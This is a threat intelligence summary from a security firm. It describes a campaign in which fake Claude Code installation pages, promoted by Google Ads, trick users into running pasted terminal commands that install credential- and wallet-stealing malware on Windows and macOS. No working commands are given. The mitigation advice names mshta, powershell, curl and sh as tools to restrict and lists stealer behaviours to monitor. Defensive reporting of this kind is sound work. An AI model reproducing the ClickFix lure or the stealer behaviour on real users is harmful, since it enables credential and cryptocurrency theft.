ALL MENU

Technology
S2W's Technology
AI
Big Data
Security
Products
SAIP
QUAXAR
XARVIS
EYEZ
Services
AI Data Consulting
Penetration Testing
Incident Response
Request for Intelligence
Resources
Event
Webinar
SIS
Conference
About S2W
About S2W
History
News

QUICK LINKS

Resources
  • Research
  • Threat Intelligence Reports
AI-Powered Threats Case Study #06: Malvertising & ClickFix
2026.05.27

✅ Report Title: AI-Powered Threats Case Study #06: Malvertising & ClickFix



✅ Executive Summary:



- As AI tools rapidly spread throughout the work environment, threat actors are conducting social engineering attacks that exploit the process of users searching for and installing AI tools.


This attack features creating fake websites which are identical to the Claude Code installation page, placing Google Ads on top, prompting users to copy specific commands then execute those commands in the terminal.



📌 Initial Access


- This attack used Malvertising to make the spoofed page appear at the top of search engine results and employed the ClickFix method, which induces users to copy and execute commands themselves.

- Threat actors created a fake website disguised as the Claude Code installation page and lured victims through Google Ads.


- Victims mistakenly executed the webpage commands directly, thinking it was a legitimate installation process, and was infected with malware during this process.



📌 Windows Malware


- Windows malware is executed through an HTA file disguised as an mp3 file.


- After compromising browser information, it can download or execute additional payloads according to C2 commands.



📌 macOS Malware


- macOS malware executes a bash script to perform malicious activities using AppleScript.


- It collects browser information, messenger data, cloud and development credentials, user documents, and cryptocurrency wallet information, then compresses and sends them to C2.


- It was also confirmed that some legitimate cryptocurrency wallet apps were replaced with apps created by threat actors.



✅ Recommended Threat Detection and Mitigation Actions:


- Response should focus on blocking access to spoofing pages, controlling the execution of suspicious commands, and monitoring C2 communications.


- Execution of mshta, powershell, curl, and sh commands provided by untrusted web pages must be restricted.


- PowerShell execution, AMSI bypass, LaunchDaemon registration, concealment directory creation, and monitoring of C2 communication are required.


- If infection is confirmed, the main credentials used on the system must be reissued.




🧑‍💻 Author: S2W TALON


👉 Contact us: https://s2w.inc/en/contact


*The full report is available upon request or with a subscription to the S2W platform.


News Highlights
Weekly Darkweb: May 2026, Week 3
2026.05.26
Previous
News Highlights
Weekly Darkweb: May 2026, Week 4
2026.06.02
Next
List